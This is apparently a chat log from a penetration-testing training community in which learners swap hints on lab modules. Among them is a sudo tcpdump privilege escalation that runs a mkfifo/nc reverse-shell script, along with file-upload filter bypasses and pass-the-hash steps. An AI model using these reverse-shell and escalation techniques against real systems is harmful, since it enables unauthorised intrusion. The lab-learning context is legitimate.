yeah permissions are only for IPC$, used smbmap as well with 3 cracked users
user that contains the flag
im on the pass the hash module and cant access davids file even tho i am david.. any hints?
I think one of the questions on the enumerating AD groups question might be wrong
Has anyone finished this section?
From active directory powerview..
Can anyone assist with this please:
htb-student@nix04:~$|| scp htb-student/upload_nix.txt htb-ac-814020@10.10.14.189:/home/htb-ac-814020/Desktop||
ssh: connect to host 10.10.14.189 port 22: Connection timed out
lost connection
Tuga?
You're trying to ssh back to your pwnbox instance? There might be certain egress rules in place that don't allow you to connect to outbound port 22 from the target instance.
Not sure why you want to do that, you can simply do the reverse|| htb-ac-814020@<pwnbox-ip>:~$ scp htb-student@<TARGET-IP>:~/htb-student/upload_nix.txt /home/htb-ac-814020/Desktop/.||
The command is from your PwnBox, not from nix04 host.
If you already knew that and are still just playing with trying to ssh to PwnBox from the target instance, you can still do it with some tweaks.
thanks - i'll use that information
I just finished the SQL Injection fundamentals, but... I don't understand 1 thing!
Why UNION payloads start with cn'? I mean... Why cn??? I'm really confused about how at one point they start with cn and this cn initial part makes things work
what
cn is just a valid entry in this database, it stands for china, the country code
Thanks a lot, I didn't understand that it was contextualized text. Now I understand! You made my day by solving this riddle
Recheck the module for other ways.
"Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt."
I have no clue what HTB wants from me. I got the julio shell through PtH but now I am lost. Anyone knows what to do?
Module: Password Attacks
Section: Pass the Hash
Can I talk to someone about the Pass the Ticket (PtT) from Linux module. Got the last flag but just want to know why it comes across incorrectly when I download it.
@unique palm DM Me
For Windows Priv Escalation: DLL Injection, is there some package that supplies the example libary.dll and x.dll to follow along with the section? I can't find anything...
The section keeps mentioning Either compile it or use the precompiled version provided., but doesn't actually reference what it is referring to.
Hello, anybody has idea on this question ? I typed in the switches multiple times and it keeps failing.
" Given the capture file at /tmp/capture.pcap, what tcpdump command will enable you to read from the capture and show the output contents in Hex and ASCII? (Please use best practices when using switches)"
tcpdump -r -X capture.pcap . I think I am placing -X in the wrong spot, I have tried all possibilities though. Please let me know what part I am missing.
did you connect via NC?
got it now .. i removed the domain flag in my invoke-hash command and it worked
-XX idk
its a vhost iirc
Thank you. I have tried that as well and didnt work. i tried this in the htb terminal it works
sudo tcpdump -r ~/capture.pcap --print -XX (but they arent taking this answer)
-XXr try this
It is but when i try running a scan against it , it gives no results
a vhost is when multiple subdomains share 1 ip
so think of it like all subdomains in that section were assigned 1 ip
0.0.0.0 academy.htb admin.academy.htb ...
add that to your /etc/hosts
This didn't work either. I have tried multiple options and googled how to print in ASCII after a packet is read using tcpdump and nothing is working!
Ahhh ok I thought it was multiple ip's
its a problem with the command syntax but i think the right command syntax should be in that section
Oh I have tried harder, smarter, all. lol The syntax works on a terminal, it's just not being accepted in the answer box.
you're really close to the answer
If you're referring to writing it this way , sudo tcpdump -Xr ~/tmp/capture.pcap I have tried that too. The same thing happened to the other question in that section and all it needed was a space but it works without on the terminal.
i dont see the need for ~ that directory simply doesn't exist
/tmp/capture.pcap thats where the file is at
Ok, thanks. yeah , nothings seems to work at this point. I will give it a try another time.
Hey guys, I have a question regarding target Global IP discovery. How do I find that?
Can someone help me with this question
You mean public ip stuff? I don't believe there's too much about public ip in academy- as the focus is on internal attacks and defense
yes
im in this level and i stuck
It's gonna be before any command line stuff happens, scroll up and you'll see a HTB{...} flag
i dont see any flag only microsoft and version
Microsoft Windows [Version 10.0.22000.1219]
(c) Microsoft Corporation. All rights reserved.
user0@ACADEMY-ICL11 C:\Users\user0>
Scroll further up
I'm having problems rdp'ing into the password attacks , passing the ticket with windows module. the task before was no prob, and it was actually same ip with different creds. reloaded the target, closed vpn, vpn'd back in. logged out and back in and I'm getting this
Wrap the password in quotes $$ is a variable call
same thing. I never wrap the password and it usually works. this is the first time i've ever had a prob with it.
$ and ! are special bash characters, they must be wrapped
or else bash interprets and rewrites them before the program ever sees them
import sys
print(sys.argv[1])
save that as echo.py and then run
python3 echo.py AnotherC0mpl3xP4$$
and youll see what the program actually sees
single quotes actually
I've never had an issue with that before. I went back to the previous section which is pass-the-hash. It's the same target, because it's already spawned and same IP. I have an RDP session right now with the same IP address using Administrator and the hash. No problems, trying to login with that password, with or without quotes, returns an error.
I was responding to them saying they did try wrapping
Are you wrapping with single quotes or double quotes
You still didn't answer
sorry lol
You also ignored my explanation of the issue and step by step instructions on how you can visualize why its an issue
if you correctly wrapped the password and still doesnt work then sorry its just the wrong pass for that account or that account is blocked from rdp
ok. Now use that as my password, or should it work in quotes.
you need to use quotes, my step by step instructions shows you why
i didn't see it until after i responded to Marcie.
yeah I've seen that, pretty neat. Is that something particular to rdp?
no its particular to bash
No it's bash
ahh gotcha
still doesn't work with quotes though. lol
Single quotes or double
Should work with Single if it's correct
ok single did work. Thanks. why only single and not double?
Because single is passed as literal string interpretation
powershell, bash and some other scripting languages
uhhh that's so frustrating. get through the modules, usually with not much problem, and something that simple has had me stuck for 2 hrs! smh
Wanna know what's crazier? People have asked that question previously
I hadn't ever had to put quotes around the password, I guess that's why it never even crossed my mind.
Then tell me how you were "wrapping" the password
idk, the previous modules with the pass the hash, well any of them till now, I've never had to put quotes around it. i was just rdp'd in with the administrator's hash with no quotes.
Because hashes for pth don't contain special characters
you should brush up on your linux and bash fundamentals
ok,so if it has special characters. because normally if they give you the password, its usually well password.
its linux 101 stuff
^
anyway. Thanks guys.
hey y'all! How do the allotted hours work? are they based on each challenge, like how long each challenge should take, or is it solely based on the amount of time it takes you to finish each challenge and then that gets added up?
Or is it based on the cubes used? I was reading one of the articles for the first challenge that you need to disconnect from the machines you are not using, but I did not find what the walkthrough example was showing.
Or Am I mixing the cubes from Academy with the time allocated on HTB?
the time estimate stuff is complete nonsense. ignore them completely
How about the access to the machines? It says if you have a free account you get 2hours, and VIP+ unlimited access. Do you know how those hours are counted?
Regular VIP gets 24 hours
those are for pwnbox access on the main platform if I remember right, not to the target machines
if you're using your own vm it doesn't affect you
hey there, anybody there passed the module LINUX PRIVILEGE ESCALATION > Environment Enumeration, I escalated to root user, then read the flag.txt but doesnt work as answer
has anyone else had excessive trouble with the labs at the end of the footprinting module? i cant even get past the easy one and i have no idea why. i feel like ive exhausted every single avenue, even finding a HTB{flag} that seemed unrelated to the entire lab
that is not what I have.
the question didn't ask you to get root either
can anyone give me a hand and tell me why this maybe didn't work - I am trying to get into host 2 for the live engagement under webshell/php module
i get this error:
||[*] Started reverse TCP handler on 10.10.14.189:4444
[-] Exploit failed: NoMethodError undefined method `get_cookies' for nil:NilClass
[*] Exploit completed, but no session was created.||
i've tried this and i still don't get it ... i've been off and on this module for like a week stuck at this one spot ... i have no clue what i'm doing wrong ... the question makes no sense
check your LHOST
yes
hello
oh ok cool
got the flag - ty
Can someone tell me how I can stop my active machines? I tried to follow the steps shown but I see it.
hint focus on the port 2121
for academy?
alright ill look into it more, thanks
Hi need help with this :
chatgpt told me to fuck off
he lacks knowledge
and i lack intelligence
Im getting this error when trying to connect to the OpenVPN. Anyone knows how I can fix it? I connected fine before, IDK what's wrong now.
2023-12-02 00:50:07 GDG6: remote_host_ipv6=n/a
2023-12-02 00:50:07 net_route_v6_best_gw query: dst ::
2023-12-02 00:50:07 sitnl_send: rtnl: generic error (-101): Network is unreachable
is your vm connected to the internet? do a ping 1.1.1.1 and check if there are replies, also try rebooting
I rebooted and it worked. Thanks.
60% of the time, rebooting works every time 
@next bronze hey where i can find the provided admin credentials in the DOCUMENTATION & REPORTING - Documentation & Reporting Practice Lab??
first qst
Module: ATTACKING COMMON APPLICATIONS
Section: WordPress - Discovery & Enumeration
Question: Enumerate the host and find a flag.txt flag in an accessible directory.
Status:
- Ran gobuster on / and /wp-admin still nothing.
Appreciate any help. Thanks.
same as your rdp creds
use wordpress tools for wordpress
Module: File Inclusion Section: Log Poisoning Question:Try to use a different technique to gain RCE and read the flag at / --------cant read/write any other log file than: /var/log/apache2/access.log.
So far i poisoned the user agent in first question to get rce - but what other technique can i use?
Hey @fathom pendant thanks for replying. Is there any other source you would refer me to?
Please, I still need help, can someone give me a nudge? that's the question on Threat Hunting & Hunting With Elastic
Module: Linux Escalation
Section:Sudo Rights Abuse
Question: I was practicing the tcpdump exploit mentioned but it did not work
-
I made a file in /tmp and was named .test and was already chmod u+x
the content in /tmp/.test:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [attacker's ip] [attacker's port] >/tmp/f
2. then I typed this command
sudo /usr/bin/tcpdump -ln -i [the ip interface i wanna listen] -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
However, it did not execute the /tmp/.test file
(note1: I have already checked the permission and the path of tcpdump, which is correct)
(note2: and I have tested that if I just type ./.test, the reverse shell is established successfully)
(note3: the below is my tcpdump version:
tcpdump version 4.99.3
libpcap version 1.10.3 (with TPACKET_V3)
OpenSSL 3.0.8 7 Feb 2023
)
Think about how you can search for the specified directory.
don't you need to run tcpdump with sudo if you want to get a root shell
try the steps given in gtfobins instead, simpler than having to send a revshell
I figure so, i just didnt find the option, but all good my enormous brain had brainstorm and I found the answer, 2 more to go complain about before completing the module
thank you i figured it out
gtfobins said i need a $
so i revised to $(/tmp/.test) then it worked
hello can anyone guide me on the Documentation & Reporting Practice Lab the rdp so slow and i am stuck on first qst
hey guys,
One of the questions in the File Transfer module require an ||RDP ||connection to a target
I'm trying to connect but i got this error which seems like a misconfiguration on the parrotOS side.
any idea what i should do?
i tried to respawn the host yet there is no change
Using crackmapexec q3 DEV01
i've cracked 3 users already using "crackmapexec --shares"
using smbclient i've already accessed the smb service but unable to locate the flag since there is no file in the following shares
Don't run xfreerdp as root
Hi everyone, AD skill assessment 1 question 'find the user clear text password' || I found a ntds.dit file in a domain replica folder, cannot parse it as the local SYSTEM key is different, also tried secretsdump.exe still nothing, all the hashes I have found including the user in question cannot be cracked|| , any help would be appreciated.
Hello. Please, someone can help me with question "Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host." in "AD Enumeration & Attacks - Skills Assessment Part II" section?
You good?
Still in need of help?
handled thanks
No, I did it. Thank you!
can someone help me with File Upload Attacks -> type filters?
I already managed to get the right extension and use the same kind of magic bytes, but when I go to the file url it gives me this error message: "The Image cannot be displayed because it contains error"
Hey guys, I have a question about the Attacking Enterprise Networks module. || I am unable to discover the last host (the one on the 172.16.9.1/24 subnet). I am using a standard pingsweep from DC01:
1..254 | ForEach-Object {"172.16.9.$($_): $(Test-Connection -count 1 -comp 172.16.9.$($_) -quiet)"} | Out-File -FilePath "output.txt"
With this command I am getting only a hit on 172.16.9.3 which is the DC01 host itself. ||
Anyone know what the problem might be?
Some machines have ICMP replying disabled, so ping won't always give you all the machines in a network.
This is default behaviour for non server windows machines FYI
The weird thing is that this is how they do it in the module itself. Would an nmap scan work (with -sn flag)?
Thanks
Or since I am pretty sure that || the target machine has ssh enabled (I found keys), would something like this work to discover the host?
proxychains nmap -p22 172.16.9.1/24
||
use TCP connect (-sT iirc) when performing nmap scan through proxychains. It doesn't work otherwise.
Be mindful that most people do Enterprise Networks blind, please put your post behind spoiler text, a pair of || before and after
You could also get creative with powershell port scanner scripts.
yep, sorry, thanks for the tip
Alright maybe I will try that since nothing else seems to work.
A tip. I don't have notes on that module or a good memory to remember that section. But, best to have at least 5 common ports instead of one, you never know if they decided to configure some services on non default ports.
you mean 5 common ports for the same service (eg ssh)?
Commonly used ports for http, rdp and so on.
use ligolo-ng and get nmap working with SYN scan
mimikatz
Hello Everyone
I need a help with Broken Authentication >
Predictable Reset Token
Task is:
Create a token on the web application exposed at subdirectory /question1/ using the Create a reset token for htbuser button. Within an interval of +-1 second a token for the htbadmin user will also be created. The algorithm used to generate both tokens is the same as the one shown when talking about the Apache OpenMeeting bug. Forge a valid token for htbadmin and login by pressing the "Check" button. What is the flag?
I'm using the reset_token_time.py script but not sure how can I use the time of the target
Pls help
I know that I should use the time of the created token of htbuser but where now should I add this time in that script?
You should use this time instead of now.
Your script checks 120 seconds.
However, the token is in the period +1/-1 second
like that?
can someone help me with this?
I read but still not sure how edit the script
Without knowing what exactly you have tried, it is difficult to give you any tips
Your script is not correct in many ways.
Take a close look at the token so that you know how to build it.
Then adapt your script so that it creates a token for the admin for +/-1 second and checks it against the page
I already tried with .phar.jpg, .phar.jpeg, and .phar.gif ext, I also use jpeg and gif magic bytes for my payload
Upload a jpg, intercept the request with Burp and then adjust the Content.
Attention! Do not touch the first bytes of the JPG. You cannot restore them if you accidentally delete them
I'm hitting the same wall. I'm pretty sure my code is not injectable (everything is sanitized, no injection points), but i'm still getting the cryptic "code injection should not be possible, even without sanitization or validation" error.
you mean this ||ÿØÿà JFIF||? I never touched them as it was for the MIME-type right?
try bypassing using double extensions & the GIF8 mimetype
already done that
well you didnt do it properly
Send me your request by DM and I'll take a look at it.
oh I got it, I didn't need to reverse it lol
thx for helping guys
Hey everyone
I'm trying to complete a task in the linux fundamentals module
The task was to find out the index number of a file in /etc and i thought i got it right but well, system says i don't and i just don't get it. Pls help, i'm starting to feel stupid.
anyone know what form the url should be in for Attacking web applications with ffuff skills assessment web fuzzing?
I found the page as described by
"One of the pages you will identify should say 'You don't have access!'. What is the full page URL? "
but no matter what format I put it in it wont accept it as the answer. I tried it with the http:// added and removed as well as with the port added and removed
Iirc there's a flag in ls that gives you the index
That's what i thought but when i tried, it always said wrong number. And i checked ten times for typos but couldn't find any. Is there something else i could have gotten wrong?
Can I get a nudge on this question from Digital Forensics. Been stuck for a long time, I can't seem to get the correct answer from the memory dump. Tried strings, and volatity to analyse it. Extract and scrutinize the memory content of the suspicious PowerShell process which corresponds to PID 6744. Determine which tool from the PowerSploit repository (accessible at https://github.com/PowerShellMafia/PowerSploit) has been utilized within the process, and enter its name as your answer
does the url say "you don't have access"?
yes. Giant bold letters across the screen. I can post the url if you want or dm it
User error: are you connected to the target machine?
then enter the domain name without the scheme of course
scheme?
http
That was it. π Thanks a lot!
i did that. Ive tried
http://url with port
http://url without port
url with port
url without port
Wrap your message in backticks (```) makes it so discord doesn't parse it
can I post the actual url? Its at least in theory the answer to one of the skills assessmnet questions
strange
yes
kk
working with
http://faculty.academy.htb/courses/linux-security.php7
try getting the same result with the -v flag
.
the answer format should be http://xxxx:PORT/xxxx
I got the same url using the v flag
you have the answer already
all you need to do is add :PORT all done
*facepalm
thanks
Boys what is the chrome extension for ADHD stuff that highlights the first char from text. I need the name
Feel free to DM me -- there's 2 reasons (that I at least encountered) for this -- possibly more.
firstly where u connect to pki in the kali or where?
question is there a way to copy paste into the workstation? I know you can copy content out of it
Yes, you can connect to the PKI server from the Kali machine. The IP is given in the question
What is Pwnbox? How does it work? Read about it here.
gracias
whaat
Sorry, I replied to the wrong message. Sorry for the ping.
hello guys, for the Attacking Common Applications module, osTicket section
do I need to get the creds
myself or use those provided in the section?
do you mean Boldify
Bionic Reader is what I use, but I'm on Firefox, not a clue if there's a chrome version too
Thanks I was hitting my head trying to remember
hey guys
on "AD Privilege Escalation Skills Assessment - Part I"
I got a problem with the upload function in Antak (want to do tunneling with ligolo but for some reason it does not allow me to upload the exe)
can someone please help?
You don't need to do tunneling, get a shell and do recon
how can i reach MS01 without tunneling?
I need assistance with this module. The question is: Find another user with an SPN set that is not listed in the section command output (case-sensitive). Its on module of Active Directory PowerView
what a good syntax to find it?
im in the linux fundamentals part three and i cant find the cronjob that is scheduled for the machine
can someone give me a clue on the "Password Attacks Lab - Easy"? Got the user to SSH, but don't know how to get the root password
Always check out ||what users have entered||
i wrote windows priv esc but it is AD priv esc...
got it
thanks man
it's very straight forward using powerview
strange
Yea I've done about everything I can think of
go through the section again the command should be in there somewhere
I'll look again but crontab is a fairly simple command
anyone having issues spawning target?
It spawned for me.
yes working now.
windows fundamentals, trying to do the first activity on a virtual machine with the HTB version of Parrot, but i cant run "xfreerdp" command, it says command not found :( i tried on parrotsecurity as well but there is the same issue. do i have to use the pwnbox to be able to do this, or is there something i am missing?
Guys I am working on Intrusion Detection with Splunk. I found the answer to the second question, which is "Enter the misused DLL's name as your answer". However I did it by looking at the PowerShell command line, not inspecting DLLs. (Also when we filter out things that target themselves as shown in the module, we are unable to find the answer, which also bugs me.) Is there another way to find misused DLLs?
try remmina not on the command line though
i just put "remmina" in terminal, popped up a window where i put ip, user, and password and it seems to work :)
thank you
yep, was able to complete it. i literally just read about the other rdp clients a couple minutes ago too and i didnt realize..
In the module I am supposed to use the terminal with "gef" even though it uses gdb, but in my terminal I used the same command the module showed and in my terminal it is "gdb", and I cannot get the same output as in the picture above
you need to install the gef extension
xfreerdp is still better, you can mount a local directory to any machine you rdp into, makes file transfers much easier, you can install with sudo apt install freerdp2-x11
Oh thank you, the first time I thought I had installed it but now realized I made a mistake in the command during installation. I repeated it carefully and now it's installed
You can do that with remmina too
true but, cli > gui
¯\_(ツ)_/¯
Module: Game Reversing & Modding
Section: Man in the Middle Game Hacking
Having some issues setting up MITM Setup. Getting server error not sure what am I doing wrong
"E: unable to locate package freerdp2-xll" :(
oops wait 11 not ll LOL
but now this
`Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.
The following information may help to resolve the situation:
The following packages have unmet dependencies:
freerdp2-x11 : Depends: libfreerdp-client2-2 (= 2.3.0+dfsg1-2+deb11u1) but 2.10.0+dfsg1-1~bpo11+1 is to be installed
E: Unable to correct problems, you have held broken packages.`
Try adding --fix-broken
apt-get install -f
try
apt-get is deprecated